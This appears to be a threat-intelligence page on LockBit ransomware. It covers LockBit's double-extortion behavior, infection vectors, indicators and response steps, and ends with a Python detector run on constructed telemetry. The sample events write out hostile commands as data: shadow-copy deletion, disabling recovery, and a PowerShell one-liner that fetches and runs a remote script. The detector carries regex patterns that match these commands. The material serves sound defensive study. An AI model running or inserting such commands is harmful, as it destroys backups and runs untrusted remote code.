Status: Critical, Active, Trending
Risk rating: Critical (95%)
LockBit Ransomware
Affiliate-based ransomware known for fast encryption and double extortion.
Tags: #ransomware #double-extortion #windows
Threat overview
LockBit operates as a ransomware-as-a-service (RaaS) platform: the core operators maintain the encryptor and the leak site, while affiliates break into victim networks, exfiltrate sensitive data, deploy the encryptor across the estate, and then publish stolen data on the leak site to pressure victims into paying.
Attack behavior
- Mass file encryption using a hybrid scheme: file contents are encrypted with AES and the symmetric key is wrapped with the operators' RSA public key, so recovery without their private key is infeasible
- Deletion of Volume Shadow Copies and disabling of backup and recovery services so victims cannot roll back
- Data exfiltration prior to encryption, enabling double extortion (pay for the decryptor and to prevent publication)
- Lateral movement via stolen credentials and RDP
Infection vectors
- Phishing e-mail attachments
- Exploitation of exposed VPN appliances and RDP endpoints (unpatched, or protected only by weak or reused passwords without MFA)
- Malicious links in e-mail
- Supply-chain compromise through trusted third-party software or service providers
Symptoms & indicators
- Files renamed with unusual extensions (for example .lockbit)
- Ransom notes dropped on desktops and in affected folders
- Recovery tools disabled (shadow copies gone, Windows recovery options turned off)
- Unexpected spikes in outbound network traffic, consistent with data exfiltration before encryption starts
Immediate response
- Isolate affected endpoints from the network immediately
- Preserve forensic images (disk and, where possible, memory) before any cleanup
- Notify legal counsel and the incident response team
- Do not pay the ransom without professional guidance; payment guarantees neither a working decryptor nor deletion of the stolen data
Removal guide
- Boot from clean media and scan the system offline
- Restore data only from verified offline or immutable backups
- Rebuild compromised domain controllers from a known-good baseline rather than attempting to clean them
- Rotate all domain credentials, including service accounts and the krbtgt account (reset it twice so that forged Kerberos tickets are invalidated)
Prevention methods
- Enable behavioral ransomware protection on endpoints and protect the agent against tampering
- Maintain immutable offline backups and test restores regularly
- Patch internet-facing VPN and RDP services promptly; disable RDP where it is not needed and require MFA where it is
- Enforce least-privilege access and avoid standing domain-admin logons on workstations
Telemetry indicators
- Execution of vssadmin delete shadows (and equivalent shadow-copy or backup deletion commands)
- Mass file renames to the .lockbit extension within a short time window
- Suspicious PowerShell download cradles (fetch-and-execute one-liners) on endpoints
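The telemetry indicators above, together with the shadow-copy deletion and mass-encryption behavior described under Attack behavior and Symptoms & indicators, can be turned into concrete detection logic. The script below is an added example written for this page; it is not code from the original page, from LockBit, or from any vendor product. The four-field event shape (timestamp, host, event type, detail), the hostnames WS-17 and WS-22, the file paths, the address 203.0.113.10 and all sample events are constructed. The extra shadow-copy commands it matches (wmic shadowcopy delete, wbadmin delete catalog, bcdedit recoveryenabled) and the threshold of 50 renames within 60 seconds are assumptions to tune against your own baseline.

```python
"""Toy detector for the LockBit telemetry indicators listed on this page.

Added example, not code from the original page, LockBit or any vendor product.
The event shape (timestamp, host, type, detail), hostnames, paths and IP are
constructed; real input would be Sysmon Event ID 1 (process create) and 11/23
(file create/rename) or an EDR export mapped to the same four fields.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Command-line patterns for shadow copy / recovery tampering. The page lists
# `vssadmin delete shadows`; the other three are common equivalents (assumption).
SHADOW_TAMPER = {
    "vssadmin_delete": re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    "wmic_shadowcopy_delete": re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    "wbadmin_delete_catalog": re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I),
    "bcdedit_recovery_off": re.compile(r"bcdedit(\.exe)?\b.*recoveryenabled\s+no", re.I),
}
# A download cradle is PowerShell that both fetches remote content and executes it.
_EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
_FETCH = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)


def shadow_tamper_kind(cmdline):
    """Return the name of the matching tamper pattern, or None for benign lines."""
    for name, pat in SHADOW_TAMPER.items():
        if pat.search(cmdline):
            return name
    return None


def is_download_cradle(cmdline):
    low = cmdline.lower()
    return "powershell" in low and bool(_EXEC.search(cmdline)) and bool(_FETCH.search(cmdline))


def detect_mass_rename(events, extension=".lockbit", threshold=50,
                       window=timedelta(seconds=60)):
    """One alert per host once `threshold` renames to `extension` land within `window`.
    The page names .lockbit; tune extension and threshold for other variants."""
    alerts, fired, per_host = [], set(), defaultdict(deque)
    for ts, host, kind, detail in sorted(events, key=lambda e: e[0]):
        if kind != "rename" or not detail.lower().endswith(extension):
            continue
        t, q = datetime.fromisoformat(ts), per_host[host]
        q.append(t)
        while t - q[0] > window:          # drop renames older than the window
            q.popleft()
        if len(q) >= threshold and host not in fired:
            fired.add(host)
            alerts.append((host, ts, f"{len(q)} renames to {extension} "
                                     f"within {int(window.total_seconds())}s"))
    return alerts


def run_detections(events):
    """Apply all three indicator checks; returns {rule: [(host, ts, detail), ...]}."""
    out = {"shadow_tamper": [], "download_cradle": [], "mass_rename": []}
    for ts, host, kind, detail in events:
        if kind != "process":
            continue
        hit = shadow_tamper_kind(detail)
        if hit:
            out["shadow_tamper"].append((host, ts, f"{hit}: {detail}"))
        if is_download_cradle(detail):
            out["download_cradle"].append((host, ts, detail))
    out["mass_rename"] = detect_mass_rename(events)
    return out


def constructed_events():
    """Constructed sample telemetry: one compromised host (WS-17), one benign host (WS-22)."""
    events = [
        ("2024-05-01T02:14:03", "WS-17", "process", "cmd.exe /c vssadmin delete shadows /all /quiet"),
        ("2024-05-01T02:14:04", "WS-17", "process", "wmic shadowcopy delete"),
        ("2024-05-01T02:14:05", "WS-17", "process", "bcdedit /set {default} recoveryenabled No"),
        ("2024-05-01T02:14:06", "WS-17", "process",
         "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
         ".DownloadString('http://203.0.113.10/x.ps1')\""),
        # Benign lookalikes that must not fire: listing, not deleting; no fetch; a single rename.
        ("2024-05-01T02:20:00", "WS-22", "process", "vssadmin list shadows"),
        ("2024-05-01T02:20:05", "WS-22", "process", "powershell -c Get-ChildItem C:\\Temp"),
        ("2024-05-01T02:20:10", "WS-22", "rename", "C:\\Users\\bob\\Documents\\report.docx.bak"),
    ]
    base = datetime.fromisoformat("2024-05-01T02:14:10")
    for i in range(60):                   # 60 .lockbit renames within 30 s on WS-17
        ts = (base + timedelta(seconds=i // 2)).isoformat()
        events.append((ts, "WS-17", "rename", f"C:\\Users\\alice\\Documents\\q{i:03d}.xlsx.lockbit"))
    return events


if __name__ == "__main__":
    for rule, hits in run_detections(constructed_events()).items():
        print(f"[{rule}] {len(hits)} hit(s)")
        for host, ts, detail in hits:
            print(f"  {ts} {host} {detail}")
```

Run it as-is to see the three rules fire only for WS-17; to use it on real data, map Sysmon process-creation and file-rename events (or your EDR's export) onto the same (timestamp, host, type, detail) tuples. The rename rule is deliberately per host and windowed, because a handful of renames to an odd extension is normal while dozens per minute on one machine is the encryption phase in progress.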
LockBit campaigns continue through affiliate networks despite law-enforcement disruptions of its infrastructure. Treat it as an active, high-risk family.